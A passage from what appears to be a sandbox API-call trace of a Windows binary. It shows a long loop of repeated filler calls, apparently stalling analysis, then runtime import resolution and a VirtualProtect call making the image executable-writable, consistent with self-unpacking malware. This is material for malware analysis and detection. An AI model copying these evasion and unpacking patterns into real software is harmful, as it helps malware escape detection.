lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0164.957] AddAtomA (lpString=0x0) returned 0x0 [0164.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0164.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.000] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.000] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.000] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.001] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.001] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.001] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.001] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.001] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.001] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.001] AddAtomA (lpString=0x0) returned 0x0 [0165.001] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.002] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.002] AddAtomA (lpString=0x0) returned 0x0 [0165.002] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.003] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.003] AddAtomA (lpString=0x0) returned 0x0 [0165.003] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.004] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.004] AddAtomA (lpString=0x0) returned 0x0 [0165.004] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.004] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.004] AddAtomA (lpString=0x0) returned 0x0 [0165.004] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.004] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.004] AddAtomA (lpString=0x0) returned 0x0 [0165.004] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.004] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.004] AddAtomA (lpString=0x0) returned 0x0 [0165.004] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.004] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.004] AddAtomA (lpString=0x0) returned 0x0 [0165.004] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.004] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.005] AddAtomA (lpString=0x0) returned 0x0 [0165.005] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.006] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.006] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.006] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.007] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.007] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.007] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.007] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.007] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.007] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.007] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.007] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.007] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.007] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.007] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.007] AddAtomA (lpString=0x0) returned 0x0 [0165.007] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.008] AddAtomA (lpString=0x0) returned 0x0 [0165.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.009] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.009] AddAtomA (lpString=0x0) returned 0x0 [0165.009] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.010] AddAtomA (lpString=0x0) returned 0x0 [0165.010] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0165.010] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0165.033] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0165.033] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0165.034] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0165.034] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0165.034] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0165.034] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0165.034] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0165.034] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0165.034] SetErrorMode (uMode=0x400) returned 0x0 [0165.034] SetErrorMode (uMode=0x0) returned 0x400 [0165.034] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0165.034] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x2b0000 [0165.057] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0165.093] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.095] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0165.095] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0165.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0165.097] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0165.098] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0165.098] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0165.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0165.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0165.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0165.105] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0165.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0165.107] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0165.107] 